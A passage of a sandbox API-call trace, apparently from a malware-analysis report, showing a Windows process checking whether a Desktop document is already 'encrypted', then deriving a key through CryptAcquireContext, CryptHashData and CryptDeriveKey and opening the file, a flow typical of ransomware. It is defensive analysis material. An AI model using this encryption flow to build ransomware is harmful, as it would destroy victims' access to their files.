cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wzgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zgmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gmnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mnB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nB4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.090] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vWuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WuNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uNbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NbBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bBj9.ots\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0032.091] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.091] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0032.091] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.091] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.091] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.091] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.091] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.091] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.091] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0032.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.091] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd949b800, ftCreationTime.dwHighDateTime=0x1d5bd53, ftLastAccessTime.dwLowDateTime=0x2c0674d0, ftLastAccessTime.dwHighDateTime=0x1d5b605, ftLastWriteTime.dwLowDateTime=0x2c0674d0, ftLastWriteTime.dwHighDateTime=0x1d5b605, nFileSizeHigh=0x0, nFileSizeLow=0x12987, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="wzgmnB4vWuNbBj9.ots", cAlternateFileName="WZGMNB~1.OTS")) returned 0x7c2240 [0032.091] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.091] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.091] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.091] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.091] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.092] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.092] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.092] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0032.092] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.092] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0032.092] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.092] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.092] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.092] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.092] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.092] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0032.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.092] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5bb8) returned 1 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0032.093] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.093] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.093] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.094] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0032.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.094] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.094] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.094] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.094] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.094] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.094] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.094] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.094] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.094] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.094] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.094] CryptCreateHash (in: hProv=0x7d5bb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.095] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.095] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.095] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.095] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.095] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.095] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.095] CryptDeriveKey (in: hProv=0x7d5bb8, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2200) returned 1 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.096] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0032.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.096] CryptDestroyHash (hHash=0x7c2100) returned 1 [0032.096] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.096] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.096] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzgmnB4vWuNbBj9.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzgmnb4vwunbbj9.ots"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0032.096] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0032.096] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0032.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0032.096] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0032.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0032.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0032.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0032.096] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0032.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.097] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0032.097] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0032.097] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0032.097] 